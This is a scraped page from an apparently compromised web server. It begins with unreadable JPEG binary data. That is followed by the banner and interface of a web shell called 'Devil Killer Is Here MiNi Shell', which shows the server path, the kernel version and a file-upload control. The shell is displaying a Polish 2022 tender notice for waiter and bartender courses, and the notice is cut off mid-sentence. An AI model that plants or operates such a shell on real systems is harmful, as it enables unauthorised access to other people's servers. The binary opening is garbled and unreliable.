JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221012/0038872501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Prowadzenie kursów zawodowych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT KAMIEŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684143</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wolińska 7B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kamień Pomorski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiatkamienski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatkamienski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Fundacja &#34;Instytut Społecznej Odpowiedzialności Organizacji&#34;</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">7393752389</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Moniuszki</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">10-275</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">biuro@doradztwo-przetargi.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.doradztwo-przetargi.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prowadzenie kursów zawodowych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6a844ba2-495b-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00388725</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002713/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Prowadzenie kursów zawodowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Powiat Kamieński szkolnictwem zawodowym stoi </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ttps://powiatkamienski.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym<br/>a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy Zakupowej w zakładce &#34;Pytania i odpowiedzi&#34;. Za datę<br/>przekazania zawiadomień oraz informacji przyjmuje się ich datę wczytania do Systemu.<br/>Pytania i dok. na wezwanie mogą być przesyłane również na adres: biuro@doradztwo-przetargi.pl<br/>https://powiatkamienski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób<br/>sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>dotycząca:<br/>a) ofert, dokumentów oraz oświadczeń (przedmiotowych i podmiotowych środków dowodowych)<br/>odbywa się przy użyciu środków komunikacji elektronicznej za pomocą Platformy zakupowej<br/>znajdującej się pod adresem https://powiatkamienski.ezamawiajacy.pl<br/>lub https://oneplace.marketplanet.pl<br/>b) inna niż oferta Wykonawcy i załączniki do oferty, odbywa się elektronicznie przy użyciu Platformy<br/>Zakupowej https://powiatkamienski.ezamawiajacy.pl w zakładce „Korespondencja” .<br/>Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania za pośrednictwem<br/>Platformy<br/>3. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na platformie zakupowej https://powiatkamienski.ezamawiajacy.pl (założenie konta jest<br/>bezpłatne). Wykonawca posiadający konto na Platformie oneplace.marketplanet.pl (dalej zwana<br/>„Platformą”) ma dostęp do dokumentacji zamówienia – przedmiotowego postępowania, formularza do<br/>złożenia oferty, formularza do zadawania pytań. W zakładce „Regulacje i procedury procesu<br/>zakupowego” https://oneplace.marketplanet.pl/regulamin znajduje się szczegółowa instrukcja odnoście<br/>założenia konta przez Wykonawcę.<br/>4.1. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie<br/>rejestrując się lub logując, w przypadku posiadania konta w Platformie Zakupowej, akceptuje warunki<br/>korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej<br/>https://powiatkamienski.ezamawiajacy.pl w zakładce „Regulacje i procedury procesu zakupowego” oraz<br/>uznaje go za wiążący;<br/>4.2. zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>Starostwa Powiatowego w Kamieniu Pomorskim; https://powiatkamienski.ezamawiajacy.pl ,<br/>lub https://oneplace.marketplanet.pl.<br/>Dokumenty lub oświadczenia, wykonawca składa w oryginale lub kopii poświadczonej za zgodność z<br/>oryginałem w formie elektronicznej, w postaci elektronicznej opatrzonej elektronicznym podpisem<br/>kwalifikowanym lub podpisem zaufanym lub podpisem osobistym. Jeżeli oryginał dokumentu lub<br/>oświadczenia, o których mowa powyżej nie zostały sporządzone w postaci dokumentu elektronicznego,<br/>wykonawca może sporządzić i przekazać elektroniczną kopię posiadanego dokumentu lub oświadczenia. W przypadku przekazywania przez wykonawcę elektronicznej kopii dokumentu lub<br/>oświadczenia, opatrzenie jej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym przez wykonawcę jest równoznaczne z poświadczeniem elektronicznej kopii<br/>dokumentu lub oświadczenia za zgodność z oryginałem.<br/>Pozostałe informacje zawarto w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W przypadku powzięcia informacji o niezgodnym z<br/>prawem przetwarzaniu w trakcie trwania postępowania czy realizacji umowy przedmiotowego<br/>postępowania, Pani/Pana danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do<br/>organu nadzorczego właściwego w sprawach ochrony danych osobowych.<br/>2. Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania<br/>danych osobowych stanowi przepis prawa Pani/Pan dane mogą być przetwarzane w sposób<br/>zautomatyzowany<br/>i nie będą profilowane.<br/>3. Ponadto:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Starostwo Powiatowe w Kamieniu Pomorskim;<br/>􀀀 w sprawach z zakresu ochrony danych osobowych może się Pan/Pani kontaktować z Inspektorem<br/>Ochrony Danych w Starostwo Powiatowe w Kamieniu Pomorskim pod adresem e-mail:<br/>iod@powiatkamienski.pl ;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego: Prowadzenie kursów zawodowych<br/>(4), Znak sprawy: 21/RPZP.08.06.00-32-K036/19 prowadzonym w trybie podstawowym bez negocjacji;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych,<br/>dalej „ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co<br/>najmniej 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli zobowiązania<br/>wskazane w ofercie i umowie przekroczą w/w przedział czasowy, okres przechowywania obejmuje ten<br/>termin;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego.<br/>W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">15/1/RPZP.08.06.00-32-K036/19</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I - Kurs Kelnerstwa<br/>a)	Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu kelnerstwa. Kurs musi zakończyć się egzaminem kwalifikacyjnym potwierdzonym uzyskaniem certyfikatu zdobycia kwalifikacji zawodowych.<br/>b)	Czas trwania kursu: minimum 16 godzin na grupę (w tym zajęcia teoretyczne i praktyczne).<br/>c)	Liczba kursów: 1 grupa.<br/>d)	Ilość uczestników/uczestniczek kursu: łącznie 10.<br/>e)	Beneficjentem kursu i egzaminu certyfikacyjnego są uczniowie Zespołu Szkół Ponadpodstawowych w Wolinie - uczestnicy projektu &#34;Powiat Kamieński szkolnictwem zawodowym stoi&#34;.<br/>f)	Planowany okres realizacji zamówienia: od daty podpisania umowy do 30 grudnia 2022 roku. <br/>g)	Szczegółowe terminy i harmonogram będą ustalone z Wykonawcą odrębnie na każdy kurs. Pierwszy termin i harmonogram zostanie przedstawiony w terminie 30 dni liczonych od daty zawarcia umowy w formie pisemnej.<br/>h)	Miejsce realizacji kursu: Zespół Szkół Ponadpodstawowych w Wolinie, ul. Słowiańska 2, 72-510 Wolin.<br/>i)	Zamawiający zapewnia odpowiednie warunki do prowadzenia części teoretycznej: salę wykładową dostosowaną do prowadzenia zajęć, z odpowiednim oświetleniem, ogrzewaniem, wentylacją, wyposażoną w sprzęt audiowizualny, w tym projektor multimedialny.<br/>j)	W przypadku realizacji zagadnień lub zajęć praktycznych wymagających zastosowania sprzętu, urządzeń lub aparatury specjalistycznej Wykonawca jest zobowiązany zapewnić tego rodzaju wyposażenie we własnym zakresie.<br/>k)	Zamawiający wymaga, aby dla każdego uczestnika/uczestniczki zostały przygotowane i zapewnione materiały dydaktyczne w tym skrypt w wersji papierowej, podręcznik (jeśli zajdzie taka potrzeba).<br/>l)	Kurs zostanie zakończony egzaminem zewnętrznym końcowym (certyfikacyjnym). Wykonawca w ramach wynagrodzenia będzie zobowiązany zorganizować i przeprowadzić egzamin certyfikacyjny dla wszystkich uczestników kursu. <br/>m)	Wykonawca w ramach realizacji zamówienia, zapewni każdemu uczestnikowi kursu jedno podejście do egzaminu certyfikacyjnego oraz wyda certyfikat wszystkim osobom, które pomyślnie zdały egzamin.<br/>n)	Po ukończeniu kursu uczestnicy otrzymają dokumenty potwierdzające jego ukończenie - zaświadczenie o którym mowa w §12 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dnia 19 marca 2019 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2019 r., poz. 652).<br/>o)	Zamawiający wymaga aby zajęcia były przeprowadzone w formie teoretyczno-praktycznej (wykłady, warsztaty praktyczne, dyskusja), zgodnie z harmonogramem i zaakceptowanym przez Zamawiającego programem szkolenia.<br/>p)	Zamawiający wymaga wydania przez Wykonawcę Zaświadczenia ukończenia kursu uprawniającego do wykonywania zawodu Kelnera potwierdzającego nabycie przez uczestników/uczestniczki kwalifikacji zawodowych na podstawie wyników egzaminów zewnętrznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena oferty brutto” – C<br/>„Dodatkowe doświadczenie trenera/instruktora (wskazanego na spełnienie warunku udziału w postępowaniu)” – D</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie trenera/instruktora (wskazanego na spełnienie warunku udziału w postępowaniu)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przygotowanie i przeprowadzenie kursów zawodowych dla uczestników projektu „Powiat Kamieński szkolnictwem zawodowym stoi”.<br/>2. Przedmiot zamówienia został podzielony na 2 części. Zamawiający przewiduje możliwość składania ofert częściowych. Wykonawca może złożyć ofertę na każdą z części zamówienia (tzn. złożyć ofertę na jedną lub więcej części zamówienia). <br/>Część II - Kurs Barmana<br/>a)	Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu barmana. Kurs musi zakończyć się egzaminem kwalifikacyjnym potwierdzonym uzyskaniem certyfikatu zdobycia kwalifikacji zawodowych.<br/>b)	Czas trwania: minimum 16 godzin na grupę.<br/>c)	Liczba kursów: 1 grupa.<br/>d)	Ilość uczestników/uczestniczek kursu: łącznie 10.<br/>e)	Beneficjentem kursu i egzaminu certyfikacyjnego są uczniowie Zespołu Szkół Ponadpodstawowych w Wolinie - uczestnicy projektu &#34;Powiat Kamieński szkolnictwem zawodowym stoi&#34;.<br/>f)	Planowany okres realizacji zamówienia: od daty podpisania umowy do 30 grudnia 2022 roku. <br/>g)	Szczegółowe terminy i harmonogram będą ustalone z Wykonawcą odrębnie na każdy kurs. Pierwszy termin i harmonogram zostanie przedstawiony w terminie 30 dni liczonych od daty zawarcia umowy w formie pisemnej.<br/>h)	Miejsce realizacji kursu: Zespół Szkół Ponadpodstawowych w Wolinie, ul. Słowiańska 2, 72-510 Wolin.<br/>i)	Zamawiający zapewnia odpowiednie warunki do prowadzenia części teoretycznej: salę wykładową dostosowaną do prowadzenia zajęć, z odpowiednim oświetleniem, ogrzewaniem, wentylacją, wyposażoną w sprzęt audiowizualny, w tym projektor multimedialny.<br/>j)	W przypadku realizacji zagadnień lub zajęć praktycznych wymagających zastosowania sprzętu, urządzeń lub aparatury specjalistycznej Wykonawca jest zobowiązany zapewnić tego rodzaju wyposażenie we własnym zakresie.<br/>k)	Zamawiający wymaga, aby dla każdego uczestnika/uczestniczki zostały przygotowane i zapewnione materiały dydaktyczne w tym skrypt w wersji papierowej, podręcznik (jeśli zajdzie taka potrzeba).<br/>l)	Zamawiający wymaga, aby dla każdego uczestnika/uczestniczki zostały przygotowane materiały zużywalne i akcesoria 